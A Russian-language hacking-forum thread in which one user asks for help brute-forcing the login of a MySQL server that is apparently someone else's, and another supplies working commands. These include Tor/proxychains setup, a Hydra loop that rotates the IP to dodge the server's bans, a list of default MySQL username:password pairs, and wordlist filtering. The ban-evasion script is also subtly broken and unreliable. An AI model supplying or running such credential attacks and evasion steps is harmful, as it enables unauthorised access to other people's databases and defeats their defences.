MySQL MetasploitBrute

[Rook]

Доброго всем времени суток.
Юзаю модуль auxiliary(scanner/mysql/mysql_login) для брута mysql
MySQL version 5.7.29
Заметил одну закономерность, что какой бы не был словарь для брута, по Verbose видно, что самое первое слово идет одно и тоже, хотя в словарях их нету. Возможно ли что это название самой БД?
Так же есть варианты Энумерации (Enum) логина админа?
или есть какие то варианты сбрутить Mysql ?
Hydra через 1400 траев отпадает по блоикровке айпи,юзаю тор,метасплоит по всей видимости сам переключает коннект, так как время от времени меняется мой исходящий IP
Medusa так же отваливается как и Гидра.
Дайте советы по этому поводу

 

[f22]

Доброго всем времени суток.
Юзаю модуль auxiliary(scanner/mysql/mysql_login) для брута mysql
MySQL version 5.7.29
Заметил одну закономерность, что какой бы не был словарь для брута, по Verbose видно, что самое первое слово идет одно и тоже, хотя в словарях их нету. Возможно ли что это название самой БД?
Так же есть варианты Энумерации (Enum) логина админа?
или есть какие то варианты сбрутить Mysql ?
Hydra через 1400 траев отпадает по блоикровке айпи,юзаю тор,метасплоит по всей видимости сам переключает коннект, так как время от времени меняется мой исходящий IP
Medusa так же отваливается как и Гидра.
Дайте советы по этому поводу

Посмотри в сторону вот этого инструмента
Попробуй запускать из под tor'a с proxychains

 

[Rook]

Посмотри в сторону вот этого инструмента
Попробуй запускать из под tor'a с proxychains

А какой командой запускать Тор с proxychains? Я делал через
Watch -n 10 anonsurf change
Но,как по мне оно криво работает,так как сервер успевает забанить айпиху,но потом меняет,но гидра всеравно успевает пропустить некоторые пароли

 

[Rook]

Посмотри в сторону вот этого инструмента

Package libmysqlclient-dev is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
libmariadb-dev-compat libmariadb-dev

E: Package 'libmysqlclient-dev' has no installation candidate

 

[f22]

А какой командой запускать Тор с proxychains? Я делал через

apt update && apt install -y proxychains tor curl

Меняешь параметры в настройках proxychains для тора
sed -i "s/\#dynamic_chain/dynamic_chain/" /etc/proxychains.conf
sed -i "s/strict_chain/#strict_chain/" /etc/proxychains.conf
sed -i "s/\#quiet_mode/quiet_mode/" /etc/proxychains.conf
sed -i "s/^socks4/socks5/" /etc/proxychains.conf

Перезапускаешь тор
service tor restart

И проверяешь
curl ifconfig.io
proxychains curl ifconfig.io

IP должны быть разные.

Теперь можешь запускать программы через тор
proxychains ./mysqlbrute -h <host> -u <username> -f <wordlist_file>

 

[Rook]

apt update && apt install -y proxychains tor curl

Меняешь параметры в настройках proxychains для тора
sed -i "s/\#dynamic_chain/dynamic_chain/" /etc/proxychains.conf
sed -i "s/strict_chain/#strict_chain/" /etc/proxychains.conf
sed -i "s/\#quiet_mode/quiet_mode/" /etc/proxychains.conf
sed -i "s/^socks4/socks5/" /etc/proxychains.conf

Перезапускаешь тор
service tor restart

И проверяешь
curl ifconfig.io
proxychains curl ifconfig.io

IP должны быть разные.

Теперь можешь запускать программы через тор
proxychains ./mysqlbrute -h <host> -u <username> -f <wordlist_file>

Сделал все так, установил всетаки брутер этот, запустил как вы и написали, но тут нету никакого лога,не видно даже перебор паролей, попробовал гидру так же запустить,через проксичейнс, так всеравно банят айпиху.

Host '185.220.100.246' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'

 

[f22]

но тут нету никакого лога,не видно даже перебор паролей

Собственно, какой лог нужен? Если удачно, он показывает, на какой строке есть пароль, нет - перебирает список.

попробовал гидру так же запустить,через проксичейнс, так всеравно банят айпиху.

Так ты меняй IP. service tor restart - вот тебе новый IP
Можно написать очень простое решение, главное, узнать, через какое время тебя банят.
Запускаешь в одном окне гидру.

А в другом небольшой скрипт:

• Получаешь PID гидры ps aux | grep -v grep | grep hydra | head -1 | tr -s " " | cut -d " " -f 2
• Запускаешь цикл, можно либо пока гидра работает, либо просто while true; do ... ; done - бесконечный
• Засыпаешь в цикле на время до бана минус 2 минуты (можешь подобрать эмпирически) sleep 18m
• Просыпаясь, ставишь на паузу гидру kill -STOP PID
• Получаешь новый IP, перезапуская тор, service tor restart
• Возобновляешь гидру kill -CONT PID
• profit

Если объединить это всё, получится такой скрипт
hydra_pid=`ps aux | grep -v grep | grep hydra | head -1 | tr -s " " | cut -d " " -f 2`; while true; do sleep 18m; kill -STOP hydra_pid; service tor restart; kill -CONT PID; done

Уверен, что есть способы проще или нативнее, обязательно покажите, если кто-то их знает.

 

[Rook]

Собственно, какой лог нужен? Если удачно, он показывает, на какой строке есть пароль, нет - перебирает список.


Так ты меняй IP. service tor restart - вот тебе новый IP
Можно написать очень простое решение, главное, узнать, через какое время тебя банят.
Запускаешь в одном окне гидру.

А в другом небольшой скрипт:

• Получаешь PID гидры ps aux | grep -v grep | grep hydra | head -1 | tr -s " " | cut -d " " -f 2
• Запускаешь цикл, можно либо пока гидра работает, либо просто while true; do ... ; done - бесконечный
• Засыпаешь в цикле на время до бана минус 2 минуты (можешь подобрать эмпирически) sleep 18m
• Просыпаясь, ставишь на паузу гидру kill -STOP PID
• Получаешь новый IP, перезапуская тор, service tor restart
• Возобновляешь гидру kill -CONT PID
• profit

Если объединить это всё, получится такой скрипт
hydra_pid=`ps aux | grep -v grep | grep hydra | head -1 | tr -s " " | cut -d " " -f 2`; while true; do sleep 18m; kill -STOP hydra_pid; service tor restart; kill -CONT PID; done

Уверен, что есть способы проще или нативнее, обязательно покажите, если кто-то их знает.

Ну лог, я имел ввиду типа как в гидре Verbose, что бы видно было перебор
Завтра попробую скрипт.
Нету вариантов, точно узнать логин от аккаунта у которого привелегии макисмальные?
Есть два сервера, которые коннектятся к этой базе mysql,в их настройках есть пароль с которым они подключаются к базе, эти сервера работают на Java

 

[f22]

Нету вариантов, точно узнать логин от аккаунта у которого привелегии макисмальные?

Максимальные обычно у рута, да админа, сам понимаешь.
Вот популярные

Спойлер

root:mysql
root:root
root:chippc
admin:admin
root:
root:nagiosxi
root:usbw
cloudera:cloudera
root:cloudera
root:moves
moves:moves
root:testpw
root@ck3tf3nc3
mcUser:medocheck123
root:mktt
root:123
dbuser:123
asteriskuser:amp109
asteriskuser:eLaStIx.asteriskuser.2oo7
root:raspberry
rootpenauditrootuserpassword
root:vagrant
root:123qweASD#

Может вот тут ещё нарыть листы
А так - искать на сайте какое-то упоминание пользователя...

 

[Rook]

А так - искать на сайте какое-то упоминание пользователя...

На форуме, есть админ с определенным никнеймом. Но логин от базы может отличатся,подозреваю что пасс не очень сложный, у меня словарей на 200гб, но гидра и тому подобные не тянут файлы в которых больше 500к записей.
Можно ли как в то по быстрому из файла словаря, вырезать все слова в которых 4 или больше символа? что бы по быстрому? а то бывает что и файлики эти долго открываются
Какое может быть упоминание "рута" на сайте ?) Пробовать никнеймы админа ?

 

[f22]

Можно ли как в то по быстрому из файла словаря, вырезать все слова в которых 4 или больше символа? что бы по быстрому? а то бывает что и файлики эти долго открываются

Да легко можно. Предположим, тебе нужно выдернуть эти строки из файла dict.txt
grep -i -Eo ".{4,}" dict.txt > more_than_4.txt
Теперь в файле more_than_4.txt у тебя будут строки, в которых 4 и больше символа.

Вот так увидишь, какой длины получился словарь
wc -l more_than_4.txt

Можно дополнительно отсортировать и удалить дубликаты
grep -i -Eo ".{4,}" dict.txt | sort -u -o more_than_4.txt

Какое может быть упоминание "рута" на сайте ?) Пробовать никнеймы админа ?

Я же тебе отправил ссылку... Вот же именно sql логины... danielmiessler/SecLists а тут вообще популярные Usernames

 

[Rook]

Да легко можно. Предположим, тебе нужно выдернуть эти строки из файла dict.txt
grep -i -Eo ".{4,}" dict.txt > more_than_4.txt
Теперь в файле more_than_4.txt у тебя будут строки, в которых 4 и больше символа.

Вот так увидишь, какой длины получился словарь
wc -l more_than_4.txt

Можно дополнительно отсортировать и удалить дубликаты
grep -i -Eo ".{4,}" dict.txt | sort -u -o more_than_4.txt


Я же тебе отправил ссылку... Вот же именно sql логины... danielmiessler/SecLists

Да я понял про список, переспросил,может быть какая то есть идея

 

[Rook]

Да легко можно. Предположим, тебе нужно выдернуть эти строки из файла dict.txt
grep -i -Eo ".{4,}" dict.txt > more_than_4.txt
Теперь в файле more_than_4.txt у тебя будут строки, в которых 4 и больше символа.

Вот так увидишь, какой длины получился словарь
wc -l more_than_4.txt

Можно дополнительно отсортировать и удалить дубликаты
grep -i -Eo ".{4,}" dict.txt | sort -u -o more_than_4.txt


Я же тебе отправил ссылку... Вот же именно sql логины... danielmiessler/SecLists а тут вообще популярные Usernames

выдает ошибку
grep -i Eo ".{4,}" hashes_org.txt > hashes4ormore.txt
grep: .{4,}: Нет такого файла или каталога

 

[f22]

выдает ошибку
grep -i Eo ".{4,}" hashes_org.txt > hashes4ormore.txt
grep: .{4,}: Нет такого файла или каталога

Потерял дефис grep -i -Eo

Можешь объединить в одну строку
grep -iEo

 

[Rook]

Потерял дефис grep -i -Eo
Посмотреть вложение 38573
Можешь объединить в одну строку
grep -iEo

Создало файл, а внутри
"Двоичный файл hashes_org.txt совпадает"

 

[f22]

Создало файл, а внутри
"Двоичный файл hashes_org.txt совпадает"

Проверь, как вводишь команду, ошибся скорее всего где-то, посмотри на скрин.
Покажи
head hashes_org.txt

 

[Rook]

Проверь, как вводишь команду, ошибся скорее всего где-то, посмотри на скрин.
Покажи
head hashes_org.txt

с грепом разобрался не много
Устанавливал себе на кали, Anonsurf из паррота, так блин походу все айпихи какие он берет, уже в блок листе
а с Проксичейнс как то не понятно мне увы(
есть еще варианты быстро менять айпихи ?